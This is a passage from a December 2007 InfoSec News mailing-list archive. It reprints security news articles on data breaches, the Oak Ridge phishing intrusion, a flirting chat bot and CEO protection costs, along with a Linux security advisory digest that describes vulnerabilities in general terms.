[ACNS Home: http://www.geocities.com/acns_home/] From alerts at infosecnews.org Mon Dec 10 01:32:46 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] When High Security is a CEO Perk Message-ID: http://www2.csoonline.com/exclusives/column.html?CID=33337 By Katherine Walsh csoonline.com Dec. 09, 2007 Quick quiz: When does the CEO of a big technology company actually love security? Answer: When the executive protection team decides that the CEO needs to travel by private jet or limo anytime, anywhere, whether alone or with family members--for security reasons. According to an analysis of proxy statements filed with the Securities and Exchange Commission by the U.S.?s largest technology companies, corporate jets and automobiles are sometimes considered not luxury items or fringe benefits, but part of the necessary cost of executive protection--not a bad perk for the holiday season. At IBM, the country?s largest technology company, "security practices provide that all air travel by the Chairman and CEO, including personal travel, be on Company aircraft,? according to the most recent proxy statement. The CEO also is driven to and from work by IBM personnel in a car leased by IBM, which may also be used for non-business occasions--again, for security reasons. In all, the company spent $373,187 on CEO S.J. Palmisano?s personal use of company aircraft and $53,409 on personal security. This includes home security and monitoring systems, as well as security personnel for Palmisano and his family and the cost of hotels, meals, car services, airfare and salary for those security personnel. It?s a decent chunk of Palmisano?s total ?other compensation? of $922,530. Likewise, at Xerox, CEO Ann Mulcahy is required whenever feasible to use the company aircraft for travel for ?security and personal safety.? Using this criteria, most of Mulcahy?s ?other compensation? can be classified as a security expense. Of the $296,026 listed under ?all other compensation? for Mulcahy in the 2007 proxy statement, $193,300 was spent on personal use of the corporate aircraft, and another $18,679 went towards home security and other miscellaneous benefits. (?All other compensation? typically includes things like matching 401(k) contributions, home relocation assistance, financial planning and other perquisites.) In terms of security perks, however, those numbers aren?t even the big ones. Oracle reportedly spent a whopping $1,708,763 on security for CEO Larry Ellison. The proxy states that Ellison is required to have a home security system but is mum on most other details about what that $1.7 million includes. And Dell reports spending $1,051,000 on personal and residential security for CEO Michael Dell in FY07. According to the proxy statement: ?The Board believes that Mr. Dell?s personal safety and security are of vital importance to the company?s business and prospects, and therefore that all these costs are appropriate corporate business expenses.? Security services are also provided to members of Dell?s immediate family and to locations other than his primary residence. Meanwhile, Cisco and Intel don?t even mention the words ?security? or ?executive protection? in the proxy statement section on executive compensation. So does the fact that Oracle reportedly spent $1.7 million protecting its chief executive, Xerox spent less than $300,000, and Cisco doesn?t mention security at all mean that Oracle is the most paranoid technology company--or that Ellison is the safest CEO? Of course not. For one thing, companies have vastly different interpretations of how they?re supposed to calculate and report executive protection costs. Dell and Oracle do consider personal use of the corporate aircraft to be part of executive compensation--they just don?t state that they consider it a security expense, as do IBM and Xerox. Second, different companies and CEOs have different needs for security. ?There is no one piece of security that should, without question, be implemented in every executive protection strategy,? says Tim Horner, managing director at Kroll. Threat levels vary across company and industry, and companies must individualize their executive protection strategies as much as possible. (For in-depth coverage, see ?The Six Things You Need to Know About Executive Protection.?) The threat environment of a particular corporation or CEO is dependant on a variety of factors, says Arnette Heintze, a retired U.S. Secret Service agent and now a security advisor at Hillard Heintze. One of those factors is corporate culture. ?The CEO of a defense contractor might be exposed to greater risk through international travel than the CEO of a restaurant chain in the United States,? he says. Who the individual is also plays a big part in determining what to spend on executive protection. Henitze gives the example of celebrity CEO (now chairman) Bill Gates of Microsoft. ?The security concerns there are not an issue so much because of the company and the industry, but because of the high profile of the executive,? says Heintze. ?Executive security can?t be viewed just in one box.? So just how much money does Microsoft spend on protecting its top executives? Ironically, the company?s proxy statement is completely silent on the matter. And that might just make it the most paranoid tech company of all. From alerts at infosecnews.org Mon Dec 10 01:33:06 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] UCSB Hosts Largest Computer Hacking Competition Ever Message-ID: http://www.independent.com/news/2007/dec/08/ucsb-hosts-largest-computer-hacking-competition-ev/ By Matt Kettmann December 8, 2007 The world?s largest computer hacking competition ever went down at UCSB on Friday, December 7, with 35 teams from nine countries logging in from their home bases and trying to take down each other?s mock websites. Hosted by UCSB?s Department of Computer Science ? where the event?s founder and coordinator Giovanni Vigna runs one of the more respected computer security programs in the world ? it was the sixth time the International Capture the Flag (iCTF) battle had been waged in five years. "This is the biggest hacking competition ever," said Vigna. "You can bet on that." By the time the dust settled on the all-day event, a team from Milan, Italy called the Chocolate Makers emerged victorious, but only after facing tough competition from Russians, Germans, Americans, Argentines, Austrians, Australians, Indians, and the French. (See the winner announcement here and final scores here.) The online war works as follows: Vigna and his upper level graduated students create a mock website with a half dozen section pages. In the morning, every team is given the same website, and must begin analyzing the structure immediately. Within minutes, they are blocking the websites security holes while other team members ? typically teams have around 20 students on them ? begin attacking the other websites? section pages. The scoring system, which is technically a secret for fear of being hacked, allocates points for both successful attacks (where a flag is captured) and defenses. This year, it also gave points for answering questions about computer security, which ranged from programming techniques to humorous trivia. That trivia system was actually hacked this year, apparently accidentally, by the team WCSC from the University of South Florida in Tampa, scoring them 35,000 points in one swoop. That gave them a huge bump in the battle's last hour, putting them briefly in first place. But they ended up finishing fifth overall. [...] From alerts at infosecnews.org Mon Dec 10 01:33:25 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Black Hat end of year announcements Message-ID: Forwarded from: jmoss -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Happy Holidays from Black Hat! You are receiving this email because you have attended a Black Hat Briefings in the past, and I want let you know what you can expect from Black Hat in the future. BRIEFINGS AND TRAININGS http://www.blackhat.com/ Black Hat is proud to be holding Trainings and Briefings in Washington D.C., Amsterdam, Las Vegas, Japan, and a mystery location in 2008. Please mark your calendars! NEW: An enhancement to all Black Hat Briefings allows all attendees greater access to each presenter. Immediately following each session the presenters are available for an additional hour to take questions in a break out room. This allows you to not only have in depth conversations but also meet other attendees interested in the same topics you are. DC 2008 Briefings & Training February 18-21, Westin Washington DC City Center New trainings include Defend the Flag by Microsoft, Side Channel Analysis and Countermeasures by Riscure, and TCP/IP Weapons School: Black Hat Edition by TaoSecurity. Europe 2008 Briefings & Training Now with three tracks per day of presentations! March 25-28, Moevenpick Hotel Amsterdam City Centre, the Netherlands New trainings include Understanding Stealth Malware by Joanna Rutkowska and Alexander Tereshkin, Side Channel Analysis and Countermeasures by Riscure, and Exploits 101 by Allen Harper. USA 2008 Briefings & Training This is the big one, thousands of people, seven tracks, BoF break outs, and more! August 2-7, Caesars Palace Las Vegas CALL for PAPERS https://cfp.blackhat.com/ Black Hat is always looking for new and unique research, demonstrations and tools. If you have something you or your team would like to present please keep the following dates in mind. D.C. 2008 Briefings CfP closes January 4 Europe 2008 Briefings CfP closes February 1 USA 2008 Briefings CfP will open February 1 Japan 2008 Briefings CfP will open May 1 RSS Announcements and Updates, News and more: http://www.blackhat.com/BlackHatRSS.xml TO REGISTER: https://www.blackhat.com/html/bh-registration/bh-registration.html To register for trainings or briefings please visit our registration site. Register early to take advantage of price discounts! LINKEDIN GROUP: After enough people suggesting it I've finally created a LinkedIn group for past Black Hat attendees. If you want to join this group please use the following link. If you are not already a member it will ask you to join. I want to help build communities around Black Hat, so if you have other ideas on how to do this please let me know! http://www.linkedin.com/e/gis/37658/744A566F2D9D We are working to launch the new Black Hat site this weekend, as well as release audio and video of several past conferences before the new year. Lots of changes are in the works! Jeff Moss Black Hat [If you wish to be removed from future announcements such as this, just reply and I'll remove you] -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.6.3 (Build 3017) Charset: us-ascii wsBVAwUBR1op2EqsDNqTZ/G1AQjBWgf/XfYqv7jcm7ayox2UPgF4ud/8bc5ZU2HP 1YPkT0epWCJgAfaazTc97pIFZg1sLqn9Kk77rGiAtt2LXn4vBXuITeRt+DZcZ1+K KZ/8Jo6d+CYnYa+YIfElJglToID+4eBmFVAq6F4obE07Qq3Jeg2GlI4YUPAqC7yh HHe7Vsk2UZq1eYXgudGbvjqyBDE/I+Uv78YyYsBmCR+T/GwWh7mTb2zgIoQfzH0b ogl6O6PnxYFgxt4hqmTZK09CpQ9uvLuZSPnzFM1dLW9O2XQ2zLPZBtPq4Ax/FHft vwgoCEb9AAkJf/myRNmAc7XzP7PoGrLz2RjINqdk4BhUafmriUqwlA== =9pH5 -----END PGP SIGNATURE----- From alerts at infosecnews.org Mon Dec 10 01:33:43 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Blood donors' personal data stolen along with laptop Message-ID: http://www.startribune.com/local/12190641.html By David Phelps Star Tribune December 6, 2007 Personal information, including the Social Security numbers of more than a quarter-million Minnesota and Wisconsin donors to Memorial Blood Centers, is in the hands of a thief. The organization revealed Wednesday that a laptop containing the names and addresses of 268,000 donors was stolen Nov. 28 as center employees set up a skyway-level blood drive in downtown Minneapolis on Seventh Street. Letters went out Wednesday to the affected donors, who make up about half of Memorial's donor base, apologizing for any inconvenience and warning them to watch for unusual activity in their banking and charge accounts. Blood centers chief executive Don Berglund said the organization believes it is highly unlikely that the person who stole the computer can gain access to the information inside because passwords and security devices had been installed. "We've never had anything like this happen before," said Berglund, who called the incident a "random crime." The theft, which was reported immediately to Minneapolis police, was caught on a security camera. Berglund said about half the laptop's records contain Social Security numbers. The records also include dates of birth and blood types. The data includes people who have donated since the center opened in 1948. Minneapolis police have asked anyone with knowledge of the computer's whereabouts to call 612-692-TIPS (8477). Not the only victims The theft of the blood center's laptop is the latest in what has become a string of crimes in which clients' personal information was stolen from an institution, most commonly retailers or financial institutions. Often the thieves seem more interested in the hardware than the information on it, but identity theft has been traced to the crimes as well. Sometimes the theft is highly sophisticated. Two years ago hackers outside a Marshall's department store in St. Paul used a telescope-shaped antenna to obtain credit card information going between cash registers and the store's computers. The theft ultimately was repeated across the country. Earlier this year Marshall's parent TJX Cos. revealed that information from at least 45.7 million credit and debit cards was stolen. The company recently agreed to pay up to $40.9 million to resolve claims by banks for money lost on Visa credit cards because of the security breach. Fraud claims associated with other credit cards in the case are still pending. The Memorial incident is similar to a case a year ago when a laptop containing the names and Social Security numbers of obstetrics patients of Allina Hospitals and Clinics was stolen from a nurse's car. That laptop was never recovered but there was no indication that the person who took it was able to use the information. "There never was any evidence the information was accessed," said Allina spokesman David Kanihan. "We sent letters [to patients], kept eyes on accounts and nothing ever happened." Nearly two years ago, a laptop containing client information was stolen from a car belonging to an employee of Ameriprise Financial Inc. That laptop was recovered before any data was accessed. 'Unfortunate situation' According to Berglund, Memorial employees who were setting up for the blood drive never saw the person who took the briefcase containing the laptop but realized right away that it had been stolen. The incident occurred at 6:43 a.m. Nov. 28, Berglund said. Memorial waited a week to send out warning letters to donors to allow police time to conduct an investigation, he said. "We want to let you know about an unfortunate situation," the letter begins. It goes on to say, "We believe that the possibility that donor information on the stolen laptop could be used inappropriately is unlikely. Nonetheless, it is always advisable to review your financial records, bank statements, credit card statements and credit reports carefully and report suspicious transactions promptly." Starting this week, Memorial will no longer ask for donors' Social Security numbers. From alerts at infosecnews.org Mon Dec 10 01:33:58 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] China Link Suspected in Lab Hacking Message-ID: http://www.nytimes.com/2007/12/09/us/nationalspecial3/09hack.html By JOHN MARKOFF The New York Times December 9, 2007 SAN FRANCISCO, Dec. 8 ? A cyber attack reported last week by one of the federal government?s nuclear weapons laboratories may have originated in China, according to a confidential memorandum distributed Wednesday to public and private security officials by the Department of Homeland Security. Security researchers said the memorandum, which was obtained by The New York Times from an executive at a private company, included a list of Web and Internet addresses that were linked to locations in China. However, they noted that such links did not prove that the Chinese government or Chinese citizens were involved in the attacks. In the past, intruders have compromised computers in China and then used them to disguise their true location. Officials at the lab, Oak Ridge National Laboratory in Tennessee, said the attacks did not compromise classified information, though they acknowledged that they were still working to understand the full extent of the intrusion. The Department of Homeland Security distributed the confidential warning to computer security officials on Wednesday after what it described as a set of ?sophisticated attempts? to compromise computers used by the private sector and the government. Government computer security officials said the warning, which was issued by the United States Computer Emergency Response Team, known as US-CERT, was related to an October attack that was also disclosed last week by officials at the Oak Ridge laboratory. According to a letter to employees written by the laboratory?s director, Thom Mason, an unknown group of attackers sent targeted e-mail messages to roughly 1,100 employees as part of the ruse. ?At this point, we have determined that the thieves made approximately 1,100 attempts to steal data with a very sophisticated strategy that involved sending staff a total of seven ?phishing? e-mails, all of which at first glance appeared legitimate,? he wrote in an e-mail message sent to employees on Monday. ?At present we believe that about 11 staff opened the attachments, which enabled the hackers to infiltrate the system and remove data.? In a statement posted on the laboratory?s Web site, the agency stated: ?The original e-mail and first potential corruption occurred on October 29, 2007. We have reason to believe that data was stolen from a database used for visitors to the Laboratory.? The laboratory said the attackers were able to gain access to a database containing personal information about visitors to the laboratory going back to 1990. The US-CERT advisory, which was not made public, stated: ?The level of sophistication and the scope of these cyber security incidents indicate that they are coordinated and targeted at private sector systems.? The US-CERT memo referred to the use of e-mail messages that fool employees into clicking on documents that then permit attackers to plant programs in their computers. These programs are then able to copy and forward specific data ? like passwords ? to remote locations. Despite improvements in computer security, phishing attacks are still a big problem. In the case of the Oak Ridge intrusion, the e-mail messages were made to seem authentic. One described a scientific conference and another referred to a Federal Trade Commission complaint. Computer security researchers cautioned that despite the US-CERT description of the attacks as sophisticated, such threats are frequently undertaken by amateur computer hackers. Classified federal computer networks are not supposed to be connected physically to the open Internet. Even so, sensitive data like employee e-mail databases can easily be compromised once access is gained to computers inside federal agencies. From alerts at infosecnews.org Tue Dec 11 01:01:27 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Warning sounded over 'flirting robots' Message-ID: Forwarded from: Dude VanWinkle Didn't see this here, and thought it should be mentioned http://www.news.com/8301-13860_3-9831133-56.html By Ina Fried December 7, 2007 Those entering online dating forums risk having more than their hearts stolen. A program that can mimic online flirtation and then extract personal information from its unsuspecting conversation partners is making the rounds in Russian chat forums, according to security software firm PC Tools. The artificial intelligence of CyberLover's automated chats is good enough that victims have a tough time distinguishing the "bot" from a real potential suitor, PC Tools said. The software can work quickly too, establishing up to 10 relationships in 30 minutes, PC Tools said. It compiles a report on every person it meets complete with name, contact information, and photos. "As a tool that can be used by hackers to conduct identity fraud, CyberLover demonstrates an unprecedented level of social engineering," PC Tools senior malware analyst Sergei Shevchenko said in a statement. Among CyberLover's creepy features is its ability to offer a range of different profiles from "romantic lover" to "sexual predator." It can also lead victims to a "personal" Web site, which could be used to deliver malware, PC Tools said. Although the program is currently targeting Russian Web sites, PC Tools is urging people in chat rooms and social networks elsewhere to be on the alert for such attacks. Their recommendations amount to just good sense in general, such as avoiding giving out personal information and using an alias when chatting online. The software company believes that CyberLover's creators plan to make it available worldwide in February. Robot chatters are just one type of social-engineering attack that uses trickery rather than a software flaw to access victim's valuable information. Such attacks have been on the rise and are predicted to continue to grow. Update 4:10 p.m. PST: Mike Greene, vice president of product strategy at PC Tools, said that the company learned of CyberLover's existence earlier this week as part of its regular monitoring of IRC chat rooms and other places where talk about malware takes place. Greene said that it is hard to tell how prevalent use of the program is in Russia. "We don't have exact statistics, but I think it's early on," he said. Greene said that the perceived anonymity of the Internet has desensitized people to the fact that information disclosed in an online chat can cause real-world damage. "People are used to not opening attachments or maybe not clicking on a link that shows up in their IM," he said. "But this emulates a real conversation, so you more are likely to give over personal information, click on a link or send your photograph." From alerts at infosecnews.org Tue Dec 11 01:01:45 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Hackers dupe professor's friend Message-ID: http://www.telegraphindia.com/1071211/asp/calcutta/story_8652563.asp By A STAFF REPORTER December 11, 2007 Hackers in Nigeria got into the email account of a Calcutta-based professor and duped one of his friends of more than a lakh. The hackers wrote from the email address of Ratan Khasnabish, who teaches in Calcutta Universitys business management department, to a businessman friend, saying he had run out of cash in Nigeria and immediately needed money to clear his hotel dues. The recipient (name withheld on request) had sent the amount through electronic money transfer system. The mail that the friend received on December 7 read: I am in Nigeria to participate in a conference and have lost my passport, credit card and handbag containing dollars while travelling in a taxi. The management of the hotel where I checked in is asking me to clear the dues immediately. Otherwise, they will throw me out. Please send me $2,500 immediately. The friend did not suspect any foul play, as he knew Khasnabish travels a lot. I sent the money on December 8 to George Pen, who the mail said was one of the agents of the hotel, said the friend. But he became suspicious on receiving a second mail from Khasnabishs email address. This time, the hackers asked for $1,800 to pay the air fare from Nigeria to Calcutta. I sent a reply in Bengali, written in Roman script, asking the sender to write back to me in the same style. But there was no response. I then called Khasnabish on his cellphone and learnt that he was in Calcutta, not Nigeria, recalled the friend. Khasnabish, who has lodged a complaint with the state home department and the CID, said the hackers had sent a similar mail to another friend who lives in Ahmedabad. But he called me as soon as he received it. Rajeev Kumar, the special inspector-general (operations) of CID, said: The victim should have called up Khasnabish before sending the money. Earlier, a number of people were duped on being told that they had won several lakhs in a lottery and would have to pay a clearance charge to receive the money. From alerts at infosecnews.org Tue Dec 11 01:02:09 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Linux Advisory Watch: December 7th, 2007 Message-ID: +------------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | December 7th, 2007 Volume 8, Number 50 | | | | Editorial Team: Dave Wreski | | Benjamin D. Thomas | +------------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines. This week, advisories were released for sitebar, e2fsprog, wesnoth, zabbix, asterisk, heimdal, liblcms, openssh, openssl, vixie-cron, apache, openoffice, cairo, samba, mono, perl, and php. The distributors include Debian, Mandriva, Red Hat, SuSE, Slackware, Ubuntu. --- >> Linux+DVD Magazine << Our magazine is read by professional network and database administrators, system programmers, webmasters and all those who believe in the power of Open Source software. The majority of our readers is between 15 and 40 years old. They are interested in current news from the Linux world, upcoming projects etc. In each issue you can find information concerning typical use of Linux: safety, databases, multimedia, scientific tools, entertainment, programming, e-mail, news and desktop environments. http://www.linuxsecurity.com/ads/adclick.php?bannerid=26 --- Knock, Knock, Knockin' on EnGarde's Door (with FWKNOP) ------------------------------------------------------ Secret knocks have been used for purposes as simple and childish as identifying friend or foe during a schoolyard fort war. Fraternities teach these knocks as a rite of passage into their society, and in our security world we can implement this layer of security to lock down an SSH server. With this guide on FWKNOP by Eckie S. (one of our own), you are taken on an easy-to-follow process of securing your platform with your own client and server port knocking set-up. Installation, iptable Rules setup, configuring access for the client and server, and everything in between. Check it out! http://www.linuxsecurity.com/content/view/131846 --- Master's Student: Social Engineering is not just a definition! -------------------------------------------------------------- We are happy to announce a new addition to the Linux Security Contributing Team: Gian G. Spicuzza. Currently a Graduate Student pursuing a Masters Degree in Computer Security (MSIA), Gian is a certified Linux/Unix administrator, the lead developer for the OSCAR-Backup System (at Sourceforge.com) and has experience in a variety of CSO, Management and consulting positions. His first topic is a quick foray into the world and psychology of Social Engineering: All the security in the world isn't going to stop one of your employees or coworkers from giving up information. Just how easy is it? Craig never worked for Linda's company, nor did he call from IT. Craig was an unethical hacker who just gained unauthorized access to her account. Why? Because a phone call is simple. Read on to see just how easy businesses can be exploited. http://www.linuxsecurity.com/content/view/131036 --> Take advantage of the LinuxSecurity.com Quick Reference Card! <-- --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf <-- -------------------------------------------------------------------------- * EnGarde Secure Community v3.0.18 Now Available! (Dec 4) ------------------------------------------------------- Guardian Digital is happy to announce the release of EnGarde Secure Community 3.0.18 (Version 3.0, Release 18). This release includes the brand new Health Center, new packages for FWKNP and PSAD, updated packages and bug fixes, some feature enhancements to Guardian Digital WebTool and the SELinux policy, as well as other new features. In distribution since 2001, EnGarde Secure Community was one of the very first security platforms developed entirely from open source, and has been engineered from the ground-up to provide users and organizations with complete, secure Web functionality, DNS, database and e-mail security, integrated intrusion detection and SELinux policies and more. http://www.linuxsecurity.com/content/view/131851 -------------------------------------------------------------------------- * Debian: New sitebar packages fix several vulnerabilities (Dec 7) ---------------------------------------------------------------- A directory traversal vulnerability in the translation module allows remote authenticated users to chmod arbitrary files to 0777 via ".." sequences in the lang parameter. http://www.linuxsecurity.com/content/view/132012 * Debian: New e2fsprogs packages fix arbitrary code execution (Dec 7) ------------------------------------------------------------------- Rafal Wojtczuk of McAfee AVERT Research discovered that e2fsprogs, ext2 file system utilities and libraries, contained multiple integer overflows in memory allocations, based on sizes taken directly from filesystem information. These could result in heap-based overflows potentially allowing the execution of arbitrary code. http://www.linuxsecurity.com/content/view/131871 * Debian: New wesnoth packages fix arbitrary file disclosure (Dec 6) ------------------------------------------------------------------ A vulnerability has been discovered in Battle for Wesnoth that allows remote attackers to read arbitrary files the user running the client has access to on the machine running the game client. http://www.linuxsecurity.com/content/view/131866 * Debian: New zabbix packages fix privilege escalation (Dec 5) ------------------------------------------------------------ Bas van Schaik discovered that the agentd process of Zabbix, a network monitor system, may run user-supplied commands as group id root, not zabbix, which may lead to a privilege escalation. http://www.linuxsecurity.com/content/view/131865 * Debian: New OpenOffice.org packages fix arbitrary Java code execution (Dec 5) ----------------------------------------------------------------------------- ulnerability has been discovered in HSQLDB, the default database engine shipped with OpenOffice.org. This could result in the execution of arbitrary Java code embedded in a OpenOffice.org database document with the user's privilege. This update requires an update of both openoffice.org and hsqldb. http://www.linuxsecurity.com/content/view/131864 * Debian: New asterisk packages fix SQL injection (Dec 2) ------------------------------------------------------- Tilghman Lesher discovered that the logging engine of Asterisk, a free software PBX and telephony toolkit performs insufficient sanitising of call-related data, which may lead to SQL injection. http://www.linuxsecurity.com/content/view/131725 -------------------------------------------------------------------------- * Mandriva: Updated heimdal packages fix potential (Dec 6) -------------------------------------------------------- It was found that the gss_userok() function in Heimdal 0.7.2 did not allocate memory for the ticketfile pointer before calling free(), which could possibly allow remote attackers to have an unknown impact via an invalid username. It is uncertain whether or not this is exploitable, however packages are being provided regardless. The updated packages have been patched to correct these issues. http://www.linuxsecurity.com/content/view/131870 * Mandriva: Updated liblcms package fixes buffer overflow (Dec 6) --------------------------------------------------------------- Stack-based buffer overflow in Little CMS (lcms) before 1.15 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted ICC profile in a JPG file. Updated package fixes this issue. http://www.linuxsecurity.com/content/view/131869 * Mandriva: Updated openssh packages fix X11 cookie (Dec 4) --------------------------------------------------------- A flaw in OpenSSH prior to 4.7 prevented ssh from properly handling when an untrusted cookie could not be created and used a trusted X11 cookie instead, which could allow attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted. The updated packages have been patched to correct these issue. http://www.linuxsecurity.com/content/view/131858 * Mandriva: Updated openssl packages fix DTLS vulnerability (Dec 4) ----------------------------------------------------------------- A buffer overflow in the DTLS implementation of OpenSSL 0.9.8 could be exploited by attackers to potentially execute arbitrary code. It is questionable as to whether the DTLS support even worked or is used in any applications; as a result this flaw most likely does not affect most Mandriva users. The updated packages have been patched to correct these issue. http://www.linuxsecurity.com/content/view/131859 * Mandriva: Updated vixie-cron packages fix DoS vulnerability (Dec 3) ------------------------------------------------------------------- Raphael Marichez discovered a denial of service bug in how vixie-cron verifies crontab file integrity. A local user with the ability to create a hardlink to /etc/crontab could prevent vixie-cron from executing certain system cron jobs. The updated packages have been patched to correct this issue. http://www.linuxsecurity.com/content/view/131847 * Mandriva: Updated apache packages fix vulnerabilities (Dec 3) ------------------------------------------------------------- A flaw in the Apache mod_proxy module was found that could potentially lead to a denial of service is using a threaded Multi-Processing Module. On sites where a reverse proxy is configured, a remote attacker could send a special reequest that would cause the Apache child process handling the request to crash. Likewise, a similar crash could occur on sites with a forward proxy configured if a user could be persuaded to visit a malicious site using the proxy (CVE-2007-3847). http://www.linuxsecurity.com/content/view/131848 -------------------------------------------------------------------------- * RedHat: Moderate: openoffice.org, hsqldb security update (Dec 5) ---------------------------------------------------------------- Updated openoffice.org and hsqldb packages that fix security flaws are now available for Red Hat Enterprise Linux 5. It was discovered that HSQLDB could allow the execution of arbitrary public static Java methods. A carefully crafted odb file opened in OpenOffice.org Base could execute arbitrary commands with the permissions of the user running OpenOffice.org. This update has been rated as having moderate security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/131861 * RedHat: Moderate: openoffice.org2 security update (Dec 5) --------------------------------------------------------- Updated openoffice.org2 packages that fix a security issue are now available for Red Hat Enterprise Linux 4.It was discovered that HSQLDB could allow the execution of arbitrary public static Java methods. A carefully crafted odb file opened in OpenOffice.org Base could execute arbitrary commands with the permissions of the user running OpenOffice.org. This update has been rated as having moderate security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/131862 -------------------------------------------------------------------------- * Slackware: cairo (Dec 4) -------------------------- New cairo packages are available for Slackware 11.0, 12.0, and -current to fix security issues. More details about this issue may be found in the Common Vulnerabilities and Exposures (CVE) database: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5503 http://www.linuxsecurity.com/content/view/131850 -------------------------------------------------------------------------- * SuSE: samba (SUSE-SA:2007:065) (Dec 5) -------------------------------------- Secunia Research has reported a bug in function reply_netbios_packet() that allowed remote attackers to execute arbitrary code by sending specially crafted WINS "Name Registration" requests followed by a WINS "Name Query" request packet. The exploitable code in samba can only be reached if the option "wins support" was enabled. http://www.linuxsecurity.com/content/view/131863 -------------------------------------------------------------------------- * Ubuntu: Mono vulnerability (Dec 4) ----------------------------------- It was discovered that Mono did not correctly bounds check certain BigInteger actions. Remote attackers could exploit this to crash a Mono application or possibly execute arbitrary code with user privileges. http://www.linuxsecurity.com/content/view/131854 * Ubuntu: Perl vulnerability (Dec 4) ----------------------------------- It was discovered that Perl's regular expression library did not correctly handle certain UTF sequences. If a user or automated system were tricked into running a specially crafted regular expression, a remote attacker could crash the application or possibly execute arbitrary code with user privileges. http://www.linuxsecurity.com/content/view/131855 * Ubuntu: Firefox regression (Dec 4) ----------------------------------- Gregory Fleischer discovered that it was possible to use JavaScript to manipulate Firefox's Referer header. A malicious web site could exploit this to conduct cross-site request forgeries against sites that relied only on Referer headers for protection from such attacks. (CVE-2007-5960) http://www.linuxsecurity.com/content/view/131853 * Ubuntu: PHP regression (Dec 3) ------------------------------- It was discovered that the wordwrap function did not correctly check lengths. Remote attackers could exploit this to cause a crash or monopolize CPU resources, resulting in a denial of service. (CVE-2007-3998) http://www.linuxsecurity.com/content/view/131849 * Ubuntu: Cairo vulnerability (Dec 3) ------------------------------------ Peter Valchev discovered that Cairo did not correctly decode PNG image data. By tricking a user or automated system into processing a specially crafted PNG with Cairo, a remote attacker could execute arbitrary code with user privileges. http://www.linuxsecurity.com/content/view/131845 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From alerts at infosecnews.org Tue Dec 11 01:02:22 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Ministry of Defence leaks counter terrorism traffic Message-ID: http://www.theregister.co.uk/2007/12/10/mod_usage_statistics/ By Dan Goodin in San Francisco The Register 10th December 2007 For the past 20 months, the Ministry of Defence has been generous enough to provide detailed information about visits to its Counter Terrorism Science & Technology [1] site. We're not sure, exactly, what to make of the logs showing some of the site's most popular pages and most prolific visitors. On the one hand, such details aren't exactly state secrets. Then again, what possible benefit can come from volunteering statistics that show that the Bulgarian IP address 85.187.138.185 was the top visitor for the month of March, having accessed 668 files for a total of 3.5 MB worth of data? Until late last week, usage stats as measured by an analysis program called Webalizer were freely available from April, 2006 through this month. We're guessing the disclosure was not intentional, because the information was quickly removed about a day after MOD admins were informed of the public pages. (The information is still available in search engine caches by using search strings such as http://www.ctcentre.mod.uk/usage/usage_200604.html, http://www.ctcentre.mod.uk/usage/usage_200605.html and so on.) Besides showing top visitors, they list some of the site's most popular pages for each month. Last month, for instance, the Counter Terrorism site had just north of 15,000 page impressions ,and its fourth most popular URL was this one relating to potential suppliers. To be sure, disclosures such as these aren't likely to lead to the kinds of security nightmares that result when, say, a consultant "loses" a laptop containing personal information belonging to hundreds of thousands of individuals. At the same time, seeming innocuous information like this can be precisely the kind of fodder gathered in footprinting exercises, in which attackers learn as much as possible about sites they intend to penetrate. Loose lips sink ships, as the saying goes. "I think I can reasonably say that any conventional enterprise or government entity most likely intends to have policies in place that would consider IP addresses of visitors to be information not intended to be casually shared on the public internet," says security researcher Rodney Thayer of Canola & Jones. The MOD is by no means the only website that has made its Webalizer logs available to the world. Running this search reveals tens, possibly thousands, of sites that allow anyone to view usage statistics. NASA, the US Army and a UK Hospital are among them. [1] http://www.ctcentre.mod.uk/index.php From alerts at infosecnews.org Wed Dec 12 00:12:53 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Munger: DOE incinerator down as waste concerns go up Message-ID: http://www.knoxnews.com/news/2007/dec/12/doe-incinerator-down-as-waste-concerns-go-up/ By Frank Munger knoxnews.com December 12, 2007 [...] --- Following last week's revelations about a computer hacking that potentially exposed the personal data of thousands of lab visitors, Oak Ridge National Laboratory is saying little about the event and the ongoing investigation. Lab spokesman Billy Stair said he couldn't comment about a report in The New York Times that the hacking may have had a link to China. The Times referred to a memo from the Department of Homeland Security that suggested "phishing" e-mails were sent to ORNL from Web locations with links to China, although that didn't necessarily mean the Chinese government or any of its citizens were behind the hacking efforts. Stair also declined comment on what agencies are involved in the investigation and wouldn't say if ORNL is collaborating with Los Alamos National Laboratory, which experienced a similar event in the same time frame. The "sophisticated" attack tapped into an unclassified database, but it would seem unlikely that ORNL was targeted for personal info on visitors. Surely, there would be easier places to infiltrate for identity theft than a high-security national lab. The lab has been reluctant to discuss possible motives. "That's a dangerous area to get into because ultimately we can only speculate, and speculation can get you into trouble," Stair said. "The prudent thing to do is to focus on 